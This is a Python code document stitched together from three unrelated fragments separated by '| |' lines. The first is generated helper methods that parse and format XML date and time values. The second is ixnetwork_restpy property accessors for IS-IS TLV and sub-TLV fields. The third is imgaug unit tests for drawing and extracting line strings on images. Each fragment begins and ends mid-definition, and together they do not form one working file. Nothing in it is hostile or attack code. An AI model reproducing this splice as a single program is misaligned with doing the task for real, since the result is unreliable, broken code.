_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (
time_parts[0], "{}".format(micro_seconds).rjust(6, "0"), )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(
hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node=None, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_validate_simple_patterns(self, patterns, target):
# pat is a list of lists of strings/patterns.
# The target value must match at least one of the patterns
# in order for the test to succeed.
found1 = True
for patterns1 in patterns:
found2 = False
for patterns2 in patterns1:
mo = re_.search(patterns2, target)
if mo is not None and len(mo.group(0)) == len(target):
found2 = True
break
if not found2:
found1 = False
break
return found1
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.items()))
@staticmethod
def gds_encode(instring):
if sys.version_info.major == 2:
| |
self._get_attribute(self._SDM_ATT_MAP['Tlv2RepeatingFieldsDelayMetric']))
@property
def ValuefieldsTlv2RepeatingFieldsSupportedBit(self):
"""
Display Name: Supported bit
Default Value: 0
Value Format: decimal
Available enum values: Metric unsupported, 1, Metric supported, 0
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValuefieldsTlv2RepeatingFieldsSupportedBit']))
@property
def Tlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric(self):
"""
Display Name: Internal metric
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric']))
@property
def Tlv2RepeatingFieldsExpenseMetric(self):
"""
Display Name: Expense metric
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv2RepeatingFieldsExpenseMetric']))
@property
def Tlv2isneighborsValuefieldsTlv2RepeatingFieldsSupportedBit(self):
"""
Display Name: Supported bit
Default Value: 0
Value Format: decimal
Available enum values: Metric unsupported, 1, Metric supported, 0
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv2isneighborsValuefieldsTlv2RepeatingFieldsSupportedBit']))
@property
def TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric(self):
"""
Display Name: Internal metric
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric']))
@property
def ValuefieldsTlv2RepeatingFieldsExpenseMetric(self):
"""
Display Name: Expense metric
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValuefieldsTlv2RepeatingFieldsExpenseMetric']))
@property
def TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsSupportedBit(self):
"""
Display Name: Supported bit
Default Value: 0
Value Format: decimal
Available enum values: Metric unsupported, 1, Metric supported, 0
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsSupportedBit']))
@property
def TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric(self):
"""
Display Name: Internal metric
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric']))
@property
def Tlv2RepeatingFieldsErrorMetric(self):
"""
Display Name: Error metric
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv2RepeatingFieldsErrorMetric']))
@property
def NeighborIDNeighborID(self):
"""
Display Name: Neighbor ID
Default Value: 0x0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NeighborIDNeighborID']))
@property
def NeighborIDPadding8Bits(self):
"""
Display Name: Padding - 8 bits
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NeighborIDPadding8Bits']))
@property
def Tlv3EndSystemNeighborsTlvCode(self):
"""
Display Name: TLV code
Default Value: 3
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv3EndSystemNeighborsTlvCode']))
@property
def Tlv3EndSystemNeighborsTlvLength(self):
"""
Display Name: TLV length
Default Value: 10
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv3EndSystemNeighborsTlvLength']))
@property
def ValueFieldsReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldsReserved']))
@property
def ValueFieldsNeighborID(self):
"""
Display Name: Neighbor ID
Default Value: 0x0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldsNeighborID']))
@property
def Tlv10AuthenticationInformationTlvCode(self):
"""
Display Name: TLV code
Default Value: 10
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv10AuthenticationInformationTlvCode']))
@property
def Tlv10AuthenticationInformationTlvLength(self):
"""
Display Name: TLV length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv10AuthenticationInformationTlvLength']))
@property
def ValueFieldsAuthenticationType(self):
"""
Display Name: Authentication type
Default Value: 1
Value Format: decimal
Available enum values: Cleartext password, 1, Routing domain private authentication method, 255
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldsAuthenticationType']))
@property
def ValueFieldsAuthenticationValue(self):
"""
Display Name: Authentication value
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldsAuthenticationValue']))
@property
def Tlv14OriginatingLSPBufferSizeTlvCode(self):
"""
Display Name: TLV code
Default Value: 14
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv14OriginatingLSPBufferSizeTlvCode']))
@property
def Tlv14OriginatingLSPBufferSizeTlvLength(self):
"""
Display Name: TLV length
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv14OriginatingLSPBufferSizeTlvLength']))
@property
def Tlv14OriginatingLSPBufferSizeValue(self):
"""
Display Name: Value
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv14OriginatingLSPBufferSizeValue']))
@property
def Tlv22ExtendedISReachabilityTlvCode(self):
"""
Display Name: TLV code
Default Value: 22
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv22ExtendedISReachabilityTlvCode']))
@property
def Tlv22ExtendedISReachabilityTlvLength(self):
"""
Display Name: TLV length
Default Value: 11
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv22ExtendedISReachabilityTlvLength']))
@property
def ValueFieldSystemIDAndPseudonodeNumber(self):
"""
Display Name: System ID and Pseudonode number
Default Value: 0
Value Format: hex
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldSystemIDAndPseudonodeNumber']))
@property
def ValueFieldDefaultMetric(self):
"""
Display Name: Default metric
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldDefaultMetric']))
@property
def ValueFieldLengthOfSubTLVs(self):
"""
Display Name: Length of Sub-TLVs
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldLengthOfSubTLVs']))
@property
def SubTLVsNoSubTLVs(self):
"""
Display Name: No sub-TLVs
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLVsNoSubTLVs']))
@property
def SubTLV3AdministrativeGroupSubTLVCode(self):
"""
Display Name: Sub-TLV code
Default Value: 3
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV3AdministrativeGroupSubTLVCode']))
@property
def SubTLV3AdministrativeGroupSubTLVLength(self):
"""
Display Name: Sub-TLV length
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV3AdministrativeGroupSubTLVLength']))
@property
def ValueFieldAdministrativeGroup(self):
"""
Display Name: Administrative group
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldAdministrativeGroup']))
@property
def SubTLV6IPv4InterfaceAddressSubTLVCode(self):
"""
Display Name: Sub-TLV code
Default Value: 6
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV6IPv4InterfaceAddressSubTLVCode']))
@property
def SubTLV6IPv4InterfaceAddressSubTLVLength(self):
"""
Display Name: Sub-TLV length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV6IPv4InterfaceAddressSubTLVLength']))
@property
def ValueFieldIpv4InterfaceAddress(self):
"""
Display Name: IPv4 interface address
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldIpv4InterfaceAddress']))
@property
def SubTLV8IPv4NeighborAddressSubTLVCode(self):
"""
Display Name: Sub-TLV code
Default Value: 8
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV8IPv4NeighborAddressSubTLVCode']))
@property
def SubTLV8IPv4NeighborAddressSubTLVLength(self):
"""
Display Name: Sub-TLV length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV8IPv4NeighborAddressSubTLVLength']))
@property
def ValueFieldIpv4NeighborAddress(self):
"""
Display Name: IPv4 neighbor address
Default Value: 0.0.0.0
Value Format: iPv4
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldIpv4NeighborAddress']))
@property
def SubTLV9MaximumLinkBandwidthSubTLVCode(self):
"""
Display Name: Sub-TLV code
Default Value: 9
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV9MaximumLinkBandwidthSubTLVCode']))
@property
def SubTLV9MaximumLinkBandwidthSubTLVLength(self):
"""
Display Name: Sub-TLV length
Default Value: 4
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV9MaximumLinkBandwidthSubTLVLength']))
@property
def ValueFieldMaximumLinkBandwidthBytessec(self):
"""
Display Name: Maximum link bandwidth (Bytes/sec)
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldMaximumLinkBandwidthBytessec']))
@property
def SubTLV10ReservableLinkBandwidthSubTLVCode(self):
"""
Display Name: Sub-TLV code
Default Value: 10
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV10ReservableLinkBandwidthSubTLVCode']))
@property
def SubTLV10ReservableLinkBandwidthSubTLVLength(self):
"""
Display Name: Sub-TLV length
Default Value: 2
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV10ReservableLinkBandwidthSubTLVLength']))
@property
def ValueFieldAuthenticationType(self):
"""
Display Name: Authentication type
Default Value: 1
Value Format: decimal
Available enum values: Cleartext password, 1, Routing domain private authentication method, 255
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldAuthenticationType']))
@property
def ValueFieldAuthenticationValue(self):
"""
Display Name: Authentication value
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldAuthenticationValue']))
@property
def SubTLV11UnreservedBandwidthSubTLVCode(self):
"""
Display Name: Sub-TLV code
Default Value: 11
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV11UnreservedBandwidthSubTLVCode']))
@property
def SubTLV11UnreservedBandwidthSubTLVLength(self):
"""
Display Name: Sub-TLV length
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV11UnreservedBandwidthSubTLVLength']))
@property
def ValueFieldUnreservedBandwidthBytessec(self):
"""
Display Name: Unreserved bandwidth (Bytes/sec)
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldUnreservedBandwidthBytessec']))
@property
def SubTLV18TEDefaultMetricSubTLVCode(self):
"""
Display Name: Sub-TLV code
Default Value: 18
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV18TEDefaultMetricSubTLVCode']))
@property
def SubTLV18TEDefaultMetricSubTLVLength(self):
"""
Display Name: Sub-TLV length
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV18TEDefaultMetricSubTLVLength']))
@property
def ValueFieldTeDefaultMetric(self):
"""
Display Name: TE Default metric
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldTeDefaultMetric']))
@property
def SubTLV28MTUSubTLVCode(self):
"""
Display Name: Sub-TLV code
Default Value: 28
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV28MTUSubTLVCode']))
@property
def SubTLV28MTUSubTLVLength(self):
"""
Display Name: Sub-TLV length
Default Value: 1
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV28MTUSubTLVLength']))
@property
def ValueFieldFBit(self):
"""
Display Name: F bit
Default Value: 0
Value Format: decimal
Available enum values: F-bit disabled, 0, F-bit enabled, 1
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldFBit']))
@property
def ValueFieldReserved(self):
"""
Display Name: Reserved
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldReserved']))
@property
def ValueFieldMtu(self):
"""
Display Name: MTU
Default Value: 0
Value Format: decimal
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldMtu']))
@property
| |
100
assert np.sum(img_aa) > 5 * 3 * 100
assert not np.array_equal(img, img_aa)
assert np.all(img[:3, -3:, :] == 0)
assert np.all(img_aa[:3, -3:, :] == 0)
assert np.all(img[-3:, :3, :] == 0)
assert np.all(img_aa[-3:, :3, :] == 0)
def test_draw_line_on_image_with_line_partially_outside_image(self):
# line partially outside if image
ls = LineString([(-1, 1), (9, 1)])
img = ls.draw_lines_on_image(
np.zeros((3, 10, 3), dtype=np.uint8),
color=(10, 200, 20),
alpha=1.0, size=1,
antialiased=False,
raise_if_out_of_image=False
)
assert img.dtype.name == "uint8"
assert np.all(img[0, :, :] == 0)
assert np.all(img[1, :, 0] == 10)
assert np.all(img[1, :, 1] == 200)
assert np.all(img[1, :, 2] == 20)
assert np.all(img[2, :, :] == 0)
def test_draw_line_on_image_with_line_fully_outside_image(self):
# line fully outside if image
ls = LineString([(-10, 1), (-9, 1)])
img = ls.draw_lines_on_image(
np.zeros((3, 10, 3), dtype=np.uint8),
color=(10, 200, 20),
alpha=1.0, size=1,
antialiased=False,
raise_if_out_of_image=False
)
assert img.dtype.name == "uint8"
assert np.all(img == 0)
def test_draw_line_on_image_with_line_fully_ooi_and_raise_true(self):
# raise_if_out_of_image=True
ls = LineString([(0-5, 5), (-1, 5)])
with self.assertRaises(Exception) as context:
_img = ls.draw_lines_on_image(
np.zeros((10, 10, 3), dtype=np.uint8),
color=(100, 100, 100),
alpha=1.0, size=3,
antialiased=False,
raise_if_out_of_image=True
)
assert "Cannot draw line string " in str(context.exception)
def test_draw_line_on_image_with_line_part_inside_img_and_raise_true(self):
# raise_if_out_of_image=True BUT line is partially inside image
# (no point is inside image though)
ls = LineString([(-1, 5), (11, 5)])
_img = ls.draw_lines_on_image(
np.zeros((10, 10, 3), dtype=np.uint8),
color=(100, 100, 100),
alpha=1.0, size=3,
antialiased=False,
raise_if_out_of_image=True
)
def test_draw_points_on_image_with_image_of_zeros(self):
# iamge of 0s
ls = LineString([(0, 1), (9, 1)])
img = ls.draw_points_on_image(
np.zeros((3, 10, 3), dtype=np.uint8),
color=(10, 255, 20),
alpha=1.0, size=3,
raise_if_out_of_image=False
)
assert img.dtype.name == "uint8"
assert np.all(img[0:2, 0:2, 0] == 10)
assert np.all(img[0:2, 0:2, 1] == 255)
assert np.all(img[0:2, 0:2, 2] == 20)
assert np.all(img[0:2, -2:, 0] == 10)
assert np.all(img[0:2, -2:, 1] == 255)
assert np.all(img[0:2, -2:, 2] == 20)
assert np.all(img[:, 2:-2, :] == 0)
def test_draw_points_on_image_with_image_of_ones(self):
# image of 1s
ls = LineString([(0, 1), (9, 1)])
img = ls.draw_points_on_image(
np.ones((3, 10, 3), dtype=np.uint8),
color=(10, 200, 20),
alpha=1.0, size=3,
raise_if_out_of_image=False
)
assert img.dtype.name == "uint8"
assert np.all(img[0:2, 0:2, 0] == 10)
assert np.all(img[0:2, 0:2, 1] == 200)
assert np.all(img[0:2, 0:2, 2] == 20)
assert np.all(img[0:2, -2:, 0] == 10)
assert np.all(img[0:2, -2:, 1] == 200)
assert np.all(img[0:2, -2:, 2] == 20)
assert np.all(img[:, 2:-2, :] == 1)
def test_draw_points_on_image_with_alpha_50_percent(self):
# alpha=0.5
ls = LineString([(0, 1), (9, 1)])
img = ls.draw_points_on_image(
np.zeros((3, 10, 3), dtype=np.uint8),
color=(10, 200, 20),
alpha=0.5, size=3,
raise_if_out_of_image=False
)
assert np.all(img[0:2, 0:2, 0] == 5)
assert np.all(img[0:2, 0:2, 1] == 100)
assert np.all(img[0:2, 0:2, 2] == 10)
assert np.all(img[0:2, -2:, 0] == 5)
assert np.all(img[0:2, -2:, 1] == 100)
assert np.all(img[0:2, -2:, 2] == 10)
assert np.all(img[:, 2:-2, :] == 0)
def test_draw_points_on_image_with_size_one(self):
# size=1
ls = LineString([(0, 1), (9, 1)])
img = ls.draw_points_on_image(
np.zeros((3, 10, 3), dtype=np.uint8),
color=(10, 200, 20),
alpha=1.0, size=1,
raise_if_out_of_image=False
)
assert np.all(img[0, :, :] == 0)
assert np.all(img[2, :, :] == 0)
assert np.all(img[1, 0, 0] == 10)
assert np.all(img[1, 0, 1] == 200)
assert np.all(img[1, 0, 2] == 20)
assert np.all(img[1, -1, 0] == 10)
assert np.all(img[1, -1, 1] == 200)
assert np.all(img[1, -1, 2] == 20)
def test_draw_points_on_image_with_ls_ooi_and_raise_true(self):
with self.assertRaises(Exception) as context:
ls = LineString([(0-5, 1), (9+5, 1)])
_img = ls.draw_points_on_image(
np.zeros((3, 10, 3), dtype=np.uint8),
color=(10, 200, 20),
alpha=0.5, size=1,
raise_if_out_of_image=True
)
assert "Cannot draw keypoint " in str(context.exception)
def test_draw_on_image_with_mocking(self):
ls = LineString([(0, 1), (9, 1)])
module_name = "imgaug.augmentables.lines."
line_fname = "%sLineString.draw_lines_on_image" % (module_name,)
points_fname = "%sLineString.draw_points_on_image" % (module_name,)
with mock.patch(line_fname, return_value=1) as mock_line, \
mock.patch(points_fname, return_value=2) as mock_points:
_image = ls.draw_on_image(
np.zeros((10, 10, 3), dtype=np.uint8),
color=(1, 2, 3), color_lines=(4, 5, 6), color_points=(7, 8, 9),
alpha=1.0, alpha_lines=0.9, alpha_points=0.8,
size=1, size_lines=3, size_points=5,
antialiased=False,
raise_if_out_of_image=True)
assert mock_line.call_count == 1
assert mock_points.call_count == 1
assert mock_line.call_args_list[0][0][0].shape == (10, 10, 3)
assert mock_line.call_args_list[0][1]["color"][0] == 4
assert mock_line.call_args_list[0][1]["color"][1] == 5
assert mock_line.call_args_list[0][1]["color"][2] == 6
assert np.isclose(mock_line.call_args_list[0][1]["alpha"], 0.9)
assert mock_line.call_args_list[0][1]["size"] == 3
assert mock_line.call_args_list[0][1]["antialiased"] is False
assert mock_line.call_args_list[0][1]["raise_if_out_of_image"] \
is True
assert mock_points.call_args_list[0][0][0] == 1 # mock_line result
assert mock_points.call_args_list[0][1]["color"][0] == 7
assert mock_points.call_args_list[0][1]["color"][1] == 8
assert mock_points.call_args_list[0][1]["color"][2] == 9
assert np.isclose(mock_points.call_args_list[0][1]["alpha"], 0.8)
assert mock_points.call_args_list[0][1]["size"] == 5
assert mock_points.call_args_list[0][1]["raise_if_out_of_image"] \
is True
def test_draw_on_image_without_mocking(self):
ls = LineString([(0, 1), (5, 1), (5, 5)])
img = ls.draw_on_image(np.zeros((10, 10, 3), dtype=np.uint8),
color=(200, 120, 40), alpha=0.5, size=1)
assert np.all(img[1, 0:5, 0] == 100)
assert np.all(img[1, 0:5, 1] == 60)
assert np.all(img[1, 0:5, 2] == 20)
assert np.all(img[1:5, 5, 0] == 100)
assert np.all(img[1:5, 5, 1] == 60)
assert np.all(img[1:5, 5, 2] == 20)
assert np.all(img[0:2+1, 0:2, 0] >= 50) # color_points is 0.5*color
assert np.all(img[0:2+1, 0:2, 1] >= 30)
assert np.all(img[0:2+1, 0:2, 2] >= 10)
assert np.all(img[0:2+1, 4:6+1, 0] >= 50)
assert np.all(img[0:2+1, 4:6+1, 1] >= 30)
assert np.all(img[0:2+1, 4:6+1, 2] >= 10)
assert np.all(img[4:6+1, 4:6+1, 0] >= 50)
assert np.all(img[4:6+1, 4:6+1, 1] >= 30)
assert np.all(img[4:6+1, 4:6+1, 2] >= 10)
assert np.all(img[0, 3, :] == 0)
assert np.all(img[7:, :, :] == 0)
def test_draw_on_image_with_empty_line_string(self):
ls = LineString([])
img = ls.draw_on_image(np.zeros((10, 10, 3), dtype=np.uint8))
assert img.shape == (10, 10, 3)
assert np.sum(img) == 0
def test_extract_from_image_size_1_single_channel(self):
ls = LineString([(0, 5), (9, 5)])
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
extract = ls.extract_from_image(img, antialiased=False)
assert extract.shape == (1, 10, 1)
assert np.array_equal(extract, img[5:6, 0:10, :])
def test_extract_from_image_size_3_single_channel(self):
ls = LineString([(1, 5), (8, 5)])
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
extract = ls.extract_from_image(img, size=3, antialiased=False)
assert extract.shape == (3, 10, 1)
assert np.array_equal(extract, img[4:6+1, 0:10, :])
def test_extract_from_image_size_3_rgb(self):
# size=3, RGB image
ls = LineString([(1, 5), (8, 5)])
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
img_rgb = np.tile(img, (1, 1, 3))
img_rgb[..., 1] += 10
img_rgb[..., 2] += 20
extract = ls.extract_from_image(img_rgb, size=3, antialiased=False)
assert extract.shape == (3, 10, 3)
assert np.array_equal(extract, img_rgb[4:6+1, 0:10, :])
def test_extract_from_image_antialiased_true(self):
# weak antialiased=True test
